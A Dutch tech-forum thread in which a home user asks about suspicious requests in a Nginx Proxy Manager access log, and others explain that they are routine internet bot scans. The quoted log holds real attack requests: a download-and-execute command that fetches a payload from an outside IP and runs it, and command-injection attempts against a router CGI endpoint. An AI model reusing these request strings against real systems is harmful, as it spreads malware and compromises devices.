Toon posts:

NPM in Proxmox LXC log bestand

Pagina: 1
Acties:

Vraag

zondag 6 augustus 2023 11:48

Acties:
  • 0 Henk 'm!
  • mekonghigh
  • Registratie: Juli 2019
  • Laatst online: 22:44

mekonghigh

Topicstarter
Mijn vraag
...
Ik heb onlangs een Nginx Proxy Manager LXC opgezet m.b.v. https://tteck.github.io/Proxmox/
Maar nu zie ik dit soort meldingen in de NPM LXC /data/logs/default-host_acces log.
code:
1
2
3
4
5
6
7
8
9
10
11
12
13

37.44.238.201 - - [06/Aug/2023:02:36:17 +0200] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 301 166 "-" "nekololis-owned-you"
37.44.238.201 - - [06/Aug/2023:02:36:17 +0200] "xel.selfrep;rm+-rf+Neko.arm7%3b%23&remoteSubmit=Save" 400 154 "-" "-"

185.224.128.141 - - [06/Aug/2023:08:09:36 +0200] "GET / HTTP/1.1" 301 166 "-" "Hello World"
183.136.225.32 - - [06/Aug/2023:08:15:28 +0200] "GET / HTTP/1.1" 301 166 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"

185.224.128.141 - - [06/Aug/2023:08:09:36 +0200] "GET / HTTP/1.1" 301 166 "-" "Hello World"
183.136.225.32 - - [06/Aug/2023:08:15:28 +0200] "GET / HTTP/1.1" 301 166 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
192.168.178.37 - - [06/Aug/2023:08:27:51 +0200] "GET / HTTP/1.1" 301 166 "-" "HomeNet/1.0"
183.136.225.32 - - [06/Aug/2023:08:31:44 +0200] "GET /favicon.ico HTTP/1.1" 301 166 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
106.13.23.40 - - [06/Aug/2023:09:07:05 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws HTTP/1.1" 400 154 "-" "-"
117.197.40.173 - - [06/Aug/2023:09:12:19 +0200] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 301 166 "-" "nekololis-owned-you"
117.197.40.173 - - [06/Aug/2023:09:12:19 +0200] "ate.arm7+zyxel.selfrep;rm+-rf+private.arm7%3b%23&remoteSubmit=Save" 400 154 "-" "-"

Maar dit ziet er volgens mij niet goed uit. Zit er nu iemand in mijn netwerk of in de LXC?
En hoe kan ik dit beter beveiligen?

Relevante software en hardware die ik gebruik
...
Proxmox

Wat ik al gevonden of geprobeerd heb
...
Ik heb geprobeert de string "shell" te blokkeren en heb deze regel gevonden voor iptables:
-A INPUT -p tcp --destination-port 80 -m string --string "shell" --algo kmp -j DROP
Maar in de LXC is Nftables geinstallerd en snap niet hoe ik deze regel kan omzetten.

Beste antwoord (via mekonghigh op 07-08-2023 15:36)

zondag 6 augustus 2023 14:07

  • .Kaas
  • Registratie: Juni 2008
  • Laatst online: 13-07 17:17

.Kaas

mekonghigh schreef op zondag 6 augustus 2023 @ 12:04:
Deze tekst; "nekololis-owned-you" deed mij best schrikken en was bang dat er iemand binnen was gekomen.
Op dit moment gebruik ik alleen maar voor een nextcloud instantie.

Edit:
Ik vertrouw het niet en ik ga voor de zekerheid de LXC maar opnieuw installeren, want nu kan ik: default-host_acces_log.1.gz niet meer openen/lezen en de rest van de logfiles wel.
Niks aan de hand, dat is enkel de user-agent die de client (bot) gebruikt, deze wordt weggeschreven in jouw logs. Dit zijn gewoon random bots die het internet scannen op vulnerabilities. Als je geen zaken exposed naar het internet die niet publiek mogen zijn, zou ik me niet druk maken als je netjes je software updates hebt doorgevoerd. :)

Alle reacties

zondag 6 augustus 2023 11:52

Acties:
  • 0 Henk 'm!
  • spone
  • Registratie: Mei 2002
  • Niet online

spone

Heb je je proxmox direct aan het internet hangen o.i.d.? Zo ja zou ik deze achter een openvpn/wireguard/willekeurig andere tunnel-oplossing hangen als je er remote bij wil :)

[ Voor 51% gewijzigd door spone op 06-08-2023 11:53 ]

i5-14600K | 32GB DDR5-6000 | RTX 5070 - MacBook Pro M1 Pro 14" 16/512

zondag 6 augustus 2023 11:54

Acties:
  • 0 Henk 'm!
  • mekonghigh
  • Registratie: Juli 2019
  • Laatst online: 22:44

mekonghigh

Topicstarter
Nee, alleen de Nginx Proxy Manager LXC hangt rechtsreeks aan het internet met port 80 en 443 geopent.

zondag 6 augustus 2023 11:57

Acties:
  • +1 Henk 'm!
  • MsG
  • Registratie: November 2007
  • Laatst online: 08:32

MsG

Forumzwerver

Het is opzich niet raar dat als je systeem rechtstreeks aan het internet (wat het systeem ook moge zijn), dat er dan mensen/systemen op de wereld zijn die allerlei GET en POST-requests proberen te sturen. Opzichzelf niets nieuws onder de zon. Zorg dat je de boel up-to-date houdt en het daarmee veilig blijft.

Maar ik denk dat Kees dit soort requests ook de hele dag door in de logs krijgt, net als elke andere publieke dienst.

Idealiter hang je het achter een VPN, maar er zal vast een reden zijn dat je er rechtstreeks bij wil kunnen.

[ Voor 11% gewijzigd door MsG op 06-08-2023 11:57 ]

Denk om uw spatiegebruik. Dit scheelt Tweakers.net kostbare databaseruimte! | Groninger en geïnteresseerd in Domotica? Kom naar DomoticaGrunn

zondag 6 augustus 2023 11:58

Acties:
  • +1 Henk 'm!
  • spone
  • Registratie: Mei 2002
  • Niet online

spone

Geen idee wat die Proxy Manager exact is, maar als die open moet staan dan is dat maar zo :)

Eens met hierboven, het zijn gewoon willekeurige pogingen van systemen/personen om een ingang te vinden. Vooral vervuiling van je logs, meer niet. Zolang je de boel up to date houdt.

i5-14600K | 32GB DDR5-6000 | RTX 5070 - MacBook Pro M1 Pro 14" 16/512

zondag 6 augustus 2023 12:04

Acties:
  • 0 Henk 'm!
  • mekonghigh
  • Registratie: Juli 2019
  • Laatst online: 22:44

mekonghigh

Topicstarter
Deze tekst; "nekololis-owned-you" deed mij best schrikken en was bang dat er iemand binnen was gekomen.
Op dit moment gebruik ik alleen maar voor een nextcloud instantie.

Edit:
Ik vertrouw het niet en ik ga voor de zekerheid de LXC maar opnieuw installeren, want nu kan ik: default-host_acces_log.1.gz niet meer openen/lezen en de rest van de logfiles wel.

[ Voor 35% gewijzigd door mekonghigh op 06-08-2023 13:05 ]

zondag 6 augustus 2023 14:07

Acties:
  • Beste antwoord
  • +1 Henk 'm!
  • .Kaas
  • Registratie: Juni 2008
  • Laatst online: 13-07 17:17

.Kaas

mekonghigh schreef op zondag 6 augustus 2023 @ 12:04:
Deze tekst; "nekololis-owned-you" deed mij best schrikken en was bang dat er iemand binnen was gekomen.
Op dit moment gebruik ik alleen maar voor een nextcloud instantie.

Edit:
Ik vertrouw het niet en ik ga voor de zekerheid de LXC maar opnieuw installeren, want nu kan ik: default-host_acces_log.1.gz niet meer openen/lezen en de rest van de logfiles wel.
Niks aan de hand, dat is enkel de user-agent die de client (bot) gebruikt, deze wordt weggeschreven in jouw logs. Dit zijn gewoon random bots die het internet scannen op vulnerabilities. Als je geen zaken exposed naar het internet die niet publiek mogen zijn, zou ik me niet druk maken als je netjes je software updates hebt doorgevoerd. :)

zondag 6 augustus 2023 14:09

Acties:
  • 0 Henk 'm!
  • .Kaas
  • Registratie: Juni 2008
  • Laatst online: 13-07 17:17

.Kaas

Wat lukt er trouwens niet met het openen van die logfile? Het is een gzip compressed file he.. dus als je 'm direct probeert te lezen als plain text wordt dat wat lastig. zcat/zless helpt ;)

zondag 6 augustus 2023 15:36

Acties:
  • 0 Henk 'm!
  • mekonghigh
  • Registratie: Juli 2019
  • Laatst online: 22:44

mekonghigh

Topicstarter
.Kaas schreef op zondag 6 augustus 2023 @ 14:07:
[...]


Niks aan de hand, dat is enkel de user-agent die de client (bot) gebruikt, deze wordt weggeschreven in jouw logs. Dit zijn gewoon random bots die het internet scannen op vulnerabilities. Als je geen zaken exposed naar het internet die niet publiek mogen zijn, zou ik me niet druk maken als je netjes je software updates hebt doorgevoerd. :)
Dit is al een hele geruststelling, updates check ik regelmatig.
Ik ben er ook nog niet aan toegekomen om opnieuw te installeren.
.Kaas schreef op zondag 6 augustus 2023 @ 14:09:
Wat lukt er trouwens niet met het openen van die logfile? Het is een gzip compressed file he.. dus als je 'm direct probeert te lezen als plain text wordt dat wat lastig. zcat/zless helpt ;)
Ik krijg deze onderstaande foutmelding van zless, maar ongeveer een half uur daarvoor kon ik het bestand nog gewoon bekijken. Alle andere .gz files kan ik gewoon inzien.
Waarschijnlijk zal het bestand dan wel corrupt zijn.
Als ik na de foutmelding "See it anyway" op Y druk dan opent het bestand en ziet het er encrypt uit.

code:
1
2
3
4

zless default-host_access.log.1.gz

gzip: default-host_access.log.1.gz: invalid compressed data--format violated
"default-host_access.log.1.gz" may be a binary file.  See it anyway?

zondag 6 augustus 2023 20:38

Acties:
  • 0 Henk 'm!
  • .Kaas
  • Registratie: Juni 2008
  • Laatst online: 13-07 17:17

.Kaas

Waarschijnlijk corrupt geraakte file, or er staat binary garbo in die zless niet snapt. Je kunt die proxy manager ff uitzetten en die file truncaten
code:
1

$ truncate -s 0 default-host_access.log.1.gz


Dit truncate het bestand naar een size van 0 (dus leeg).

Daarna proxy manager weer starten en je zou weer een schone log file moeten hebben.

maandag 7 augustus 2023 15:40

Acties:
  • +1 Henk 'm!
  • mekonghigh
  • Registratie: Juli 2019
  • Laatst online: 22:44

mekonghigh

Topicstarter
.Kaas schreef op zondag 6 augustus 2023 @ 20:38:
Waarschijnlijk corrupt geraakte file, or er staat binary garbo in die zless niet snapt. Je kunt die proxy manager ff uitzetten en die file truncaten
code:
1

$ truncate -s 0 default-host_access.log.1.gz


Dit truncate het bestand naar een size van 0 (dus leeg).

Daarna proxy manager weer starten en je zou weer een schone log file moeten hebben.
Nu ik het bestand leeg gemaakt heb, kan ik het bestand weer inzien.
Thanks.
Pagina: 1
Reageer

Apple iPhone 16e LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq